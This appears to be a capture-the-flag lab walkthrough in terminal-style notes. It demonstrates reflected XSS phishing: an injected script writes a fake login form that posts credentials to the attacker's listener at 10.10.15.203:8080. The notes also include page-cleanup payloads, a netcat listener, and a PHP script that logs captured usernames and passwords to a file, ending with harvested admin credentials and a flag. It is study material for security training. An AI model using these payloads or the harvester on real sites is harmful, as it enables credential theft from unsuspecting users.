XSS PHISHING

#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * review the HTML source and identify parameters
 * also review the .js file

#perform a test to see where the input is being stored
root@oco:~$ BROWSER > {targetSite:port}
 input field: test
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * <img src='test'>
 
#perform xss vulnerability test
root@oco:~$ BROWSER > {targetSite:port}
 input field: <script>alert(window.origin)</script>
 
#create the correct payload
root@oco:~$ '><script>alert(window.origin)</script>
 * the single quote & the greater than symbol together '> closes the src attribute
   and the img tag <img src=''>. since this element is now closed, the original 
   member '> will now be moved to the back of the ending </script> tag
    - <img src=''><script>alert(window.origin)</script>'>

root@oco:~$ ip address show
 * 10.10.15.203

#prepare HTML code locally to see how it'll look
root@oco:~$ nano xssPhishing
 <h3>Please login to continue</h3>
 <form action=http://10.10.15.203>
   <input type="username" name="username" placeholder="Username">
   <input type="password" name="password" placeholder="Password">
   <input type="submit" name="submit" value="Login">
 </form>

#minify
root@oco:~$ BROWSER > https://www.toptal.com/developers/html-minifier
 input: ...HTML code...
 output: ...minified HTML code...
 
#inject
root@oco:~$ BROWSER > {targetSite:port}
 input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');</script>
 * must inject an HTML code that displays a login form on the targeted page
 * this form should send the login information to a server we are listening on, such
   that once a user attempts to log in, we'd get their credentials
 * arbitrary port number 8080 is required in case regular port 80 is already in use
 
#cleanup - remove unnecessary items on the page to make it look legitimate
root@oco:~$ BROWSER > CTRL + SHIFT + C
 * this opens the page inspector picker
    - click on the element that must be removed
       - the image url field in the example
          - urlform is the target
          - additional payload is now document.getElementById('urlform').remove();
             - this must be put behind the document.write() function
root@oco:~$ BROWSER > {targetSite:port}
 input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script>
 * arbitrary port number 8080 is required in case regular port 80 is already in use

#clean up the code to remove any signs of tampering
#this removes any original HTML code left over by commenting it
root@oco:~$ BROWSER > {targetSite:port}
 input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
 * arbitrary port number 8080 is required in case regular port 80 is already in use
 
root@oco:~$ nc -nlvp 8080
 listening on [any] 8080 ...
 connect to [10.10.15.203] from (UNKNOWN) [10.10.15.203] 41330
 GET /?username=username&password=password&submit=Login HTTP/1.1
 Host: 10.10.15.203:8080
 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://10.129.141.202/
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 Sec-GPC: 1
 
 * the nc cmd above will close after handling a single connection
   to accept multiple connections, you can use a loop in a while statement in Bash
    - see below code for multi connection implementation

root@oco:~$ while true; do
 echo "Connection received at $(date)" >> connections.log
 sudo nc -nlvp 8080
 done

 * this will restart nc each time a connection closes, essentially creating a 
   simple, persistent listener that accepts multiple connections sequentially
   additionally, this has logging implemented that log connection times and 
   IP addresses
 * netcat doesn't handle HTTP request correctly, so this is only a sample
    - use a PHP listening server instead to capture and to make it look like
      the victims successfully logged in after logging in with their credentials

root@oco:~$ mkdir -p /tmp/tmpserver
root@oco:~$ cd /tmp/tmpserver
root@oco:~$ nano /tmp/tmpserver/index.php #at this step we wrote our index.php file
 <?php
   if (isset($_GET['username']) && isset($_GET['password'])) {
     $file = fopen("creds.txt", "a+");
     fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
     header("Location: http://10.10.15.203:8080/phishing/index.php");
     fclose($file);
     exit();
   }
 ?>
root@oco:~$ sudo php -S 0.0.0.0:8080
 PHP 7.4.15 Development Server (http://0.0.0.0:8080) started
 [Mon Nov  4 20:11:33 2024] PHP 8.2.24 Development Server (http://0.0.0.0:8081) started
 [Mon Nov  4 20:18:46 2024] 10.129.116.103:46910 Accepted
 [Mon Nov  4 20:18:46 2024] 10.129.116.103:46910 [302]: GET /?username=admin&password=p1zd0nt57341myp455&submit=Login
 [Mon Nov  4 20:18:46 2024] 10.129.116.103:46910 Closing

#
root@oco:~$ BROWSER > {targetSite:port}/phishing/index.php
root@oco:~$ BROWSER > {targetSite:port}/phishing/send.php
root@oco:~$ BROWSER > {targetSite:port}/phishing/login.php
 * admin:p1zd0nt57341myp455
 * HTB{r3f13c73d_cr3d5_84ck_2_m3}